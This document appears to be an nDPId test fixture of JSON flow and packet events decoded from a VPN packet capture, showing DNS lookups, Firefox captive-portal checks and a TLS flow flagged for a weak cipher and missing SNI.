00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1569687267453,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267453,"pkt":"pHczjPFANDY7z3UoCABFAAA0AABAAEAGJU0KAADjCgAAld4hH0glPK3eiXsRe4AREAA75QAAAQEIChwN0AsAIb2q"}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267453,"flow_last_seen":1569687267453,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687267453,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56866,"dst_port":8060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1569687267453,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267453,"pkt":"2DE0IHf7NDY7z3UoCABFAAA0AABAAEAGJUsKAADjCgAAl94iH3wAQcGNmjQa94AREAAjsAAAAQEIChwN0AsGksZO"}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1569687267454,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267454,"pkt":"NDY7z3UopHczjPFACABFAAA0sX1AAEAGc88KAACVCgAA4x9I3iGJexF7JTyt34ARAPMpJgAAAQEICgAh33UcDdAL"}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1569687267455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267455,"pkt":"pHczjPFANDY7z3UoCABFAAA0AABAAEAGJU0KAADjCgAAld4hH0glPK3fiXsRfIAQEAAaFwAAAQEIChwN0A0AId91"}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687262866,"flow_last_seen":1569687262866,"flow_idle_time":7560000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":1,"thread_ts_msec":1569687262866,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"162.222.43.153","src_port":56881,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1569687262866,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1569687262866,"pkt":"LH6BsEqhNDY7z3UoCABFAABEAABAAEAGYVoKAADjot4rmd4xAbu3QBvT9S8yS4AYEAD8CwAAAQEIChwNvkTkAuRNDi2ISqeLxJuBXTMcrWivnw=="}
00783{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1569687262866,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":292,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":292,"pkt_l4_len":258,"thread_ts_msec":1569687262866,"pkt":"LH6BsEqhNDY7z3UoCABFAAEWAABAAEAGYIgKAADjot4rmd4xAbu3QBvj9S8yS4AYEACf4gAAAQEIChwNvkTkAuRNC2FzYPnyOhEIxzv9HgAAAQAAAAAABf0HAAAAAAAAAFYAAAAAABO4pgAAAfJ1AAAAGzdZOcQAAAAAAAAAAAAAAAAAAAAAAAAAAGwAAAAAEjynVwAAAAAACz6PAAAAAABmQ+JAyo3EgU6LQwAAAAAAAAAAAAAACK7duMsBAQAAAAELYXNg+fI6EQjHO\/0eAAABAAAAAAAF\/QcAAAAAAAAAVgAAAAAAE7imAAAB8nUAAAAbN1k5xAAAAAAAAAAAAAAAAAAAAAAAAAAAbAAAAAASPKdXAAAAAAALPo8AAAAAAAAAAQ=="}
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1569687262866,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1569687262866,"pkt":"LH6BsEqhNDY7z3UoCABFAABEAABAAEAGYVoKAADjot4rmd4xAbu3QBzF9S8yS4AYEABLrAAAAQEIChwNvkTkAuRNchVP5mraMf5Tgny7zRbHZQ=="}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":298,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267035,"flow_last_seen":1569687267035,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687267035,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1569687267035,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687267035,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGwVUKAADjCCVmW95hAbsGNnxMAAAAALAC\/\/9wfAAAAgQFtAEDAwUBAQgKHA3OcQAAAAAEAgAA"}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1569687267077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569687267077,"pkt":"NDY7z3UoLH6BsEqhCABFAAA47VEAAPcGXQsIJWZbCgAA4wG73mHOEwD1BjZ8TZASgABbLAAAAgQFtAEBCAo\/+a5OHA3OcQ=="}
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1569687267077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267077,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGwWEKAADjCCVmW95hAbsGNnxNzhMA9oAQ\/\/\/yvgAAAQEIChwNzpw\/+a5O"}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":301,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687267035,"flow_last_seen":1569687267079,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569687267079,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"c9f0b47c9805f516e6d3900cb51f7841","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01205{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":303,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267035,"flow_last_seen":1569687267125,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1600,"flow_avg_l4_payload_len":266,"midstream":0,"thread_ts_msec":1569687267125,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"c9f0b47c9805f516e6d3900cb51f7841","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA"}}
01592{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":309,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687267035,"flow_last_seen":1569687267203,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5944,"flow_avg_l4_payload_len":495,"midstream":0,"thread_ts_msec":1569687267203,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"*.pandion.viasat.com,pandion.viasat.com","ja3":"c9f0b47c9805f516e6d3900cb51f7841","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Entrust, Inc., OU=See www.entrust.net\/legal-terms, OU=(c) 2012 Entrust, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K","subjectDN":"C=US, ST=California, L=Carlsbad, O=Viasat Inc., CN=*.pandion.viasat.com","fingerprint":"92:70:CF:E3:69:4B:1D:F4:E2:DE:63:54:EC:DF:40:DB:F3:AC:D1:CA"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267453,"flow_last_seen":1569687267453,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687267453,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56865,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1569687267453,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267453,"pkt":"pHczjPFANDY7z3UoCABFAAA0AABAAEAGJU0KAADjCgAAld4hH0glPK3eiXsRe4AREAA75QAAAQEIChwN0AsAIb2q"}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267453,"flow_last_seen":1569687267453,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687267453,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56866,"dst_port":8060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1569687267453,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267453,"pkt":"2DE0IHf7NDY7z3UoCABFAAA0AABAAEAGJUsKAADjCgAAl94iH3wAQcGNmjQa94AREAAjsAAAAQEIChwN0AsGksZO"}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1569687267454,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267454,"pkt":"NDY7z3UopHczjPFACABFAAA0sX1AAEAGc88KAACVCgAA4x9I3iGJexF7JTyt34ARAPMpJgAAAQEICgAh33UcDdAL"}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1569687267455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267455,"pkt":"pHczjPFANDY7z3UoCABFAAA0AABAAEAGJU0KAADjCgAAld4hH0glPK3fiXsRfIAQEAAaFwAAAQEIChwN0A0AId91"}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":347,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267477,"flow_last_seen":1569687267477,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1569687267477,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57253,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1569687267477,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1569687267477,"pkt":"LH6BsEqhNDY7z3UoCABFAAA5Pw0AAP8R2y0KAADjS0tLS9+lADUAJfklv50BAAABAAAAAAAAB21vemlsbGEDb3JnAAABAAE="}
00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":347,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267477,"flow_last_seen":1569687267477,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1569687267477,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57253,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mozilla.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":348,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267481,"flow_last_seen":1569687267481,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1569687267481,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":62427,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1569687267481,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1569687267481,"pkt":"LH6BsEqhNDY7z3UoCABFAABG89oAAP8RJlMKAADjS0tLS\/PbADUAMlit7RYBAAABAAAAAAAADGRldGVjdHBvcnRhbAdmaXJlZm94A2NvbQAAAQAB"}
00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267481,"flow_last_seen":1569687267481,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1569687267481,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":62427,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"detectportal.firefox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":349,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687249612,"flow_last_seen":1569687267482,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":61,"midstream":1,"thread_ts_msec":1569687267482,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56884,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"detectportal.firefox.com","url":"detectportal.firefox.com\/success.txt?ipv4","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.13; rv:69.0) Gecko\/20100101 Firefox\/69.0"}}
00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":350,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687249612,"flow_last_seen":1569687267483,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":302,"flow_avg_l4_payload_len":60,"midstream":1,"thread_ts_msec":1569687267483,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56917,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"detectportal.firefox.com","url":"detectportal.firefox.com\/success.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.13; rv:69.0) Gecko\/20100101 Firefox\/69.0"}}
00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":349,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687249612,"flow_last_seen":1569687267482,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":61,"midstream":1,"thread_ts_msec":1569687267482,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56884,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"detectportal.firefox.com","url":"detectportal.firefox.com\/success.txt?ipv4","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.13; rv:69.0) Gecko\/20100101 Firefox\/69.0"}}
00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":350,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687249612,"flow_last_seen":1569687267483,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":302,"flow_avg_l4_payload_len":60,"midstream":1,"thread_ts_msec":1569687267483,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56917,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"detectportal.firefox.com","url":"detectportal.firefox.com\/success.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.13; rv:69.0) Gecko\/20100101 Firefox\/69.0"}}
00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1569687267493,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":1569687267493,"pkt":"NDY7z3UoLH6BsEqhCABFAABJAABAADoRnytLS0tLCgAA4wA136UANZKzv52BgAABAAEAAAAAB21vemlsbGEDb3JnAAABAAHADAABAAEAAAAaAAQ\/9dDD"}
00783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":353,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267477,"flow_last_seen":1569687267493,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569687267493,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57253,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mozilla.org","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"63.245.208.195"}}
00712{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1569687267500,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":242,"pkt_l4_len":208,"thread_ts_msec":1569687267500,"pkt":"NDY7z3UoLH6BsEqhCABFAADkAABAADoRnpBLS0tLCgAA4wA189sA0PLn7RaBgAABAAUAAAAADGRldGVjdHBvcnRhbAdmaXJlZm94A2NvbQAAAQABwAwABQABAAAAIwAeDGRldGVjdHBvcnRhbARwcm9kBm1vemF3cwNuZXQAwDYABQABAAAADgAoDGRldGVjdHBvcnRhbAdmaXJlZm94BmNvbS12MgllZGdlc3VpdGXAT8BgAAUAAQAAUnoAFAVhMTA4OQRkc2NkBmFrYW1hacBPwJQAAQABAAAACQAEuBk4UsCUAAEAAQAAAAkABLgZODM="}
00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":354,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267481,"flow_last_seen":1569687267500,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1569687267500,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":62427,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"detectportal.firefox.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.25.56.82"}}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":362,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267677,"flow_last_seen":1569687267677,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1569687267677,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.10.115.210","src_port":56879,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00531{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1569687267677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1569687267677,"pkt":"LH6BsEqhNDY7z3UoCABFAABb+tIAAEAGzQsKAADjNApz0t4vAbv\/h0Qcal\/PeIAYEACaRQAAAQEIChwN0OQwQN34FwMDACIAAAAAAAAAAwpFwR2TiNxP0z\/UzUIiCJ75mBQ8ToLTjZaT"}
00526{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1569687267713,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1569687267713,"pkt":"NDY7z3UoLH6BsEqhCABFAABXHWRAAOsGv300CnPSCgAA4wG73i9qX894\/4dEQ4AYAHaKdwAAAQEICjBBJbkcDdDkFwMDAB60PFmzucBfQdusHvXD0\/WWAM1faNPMBMLPArfIzdE="}
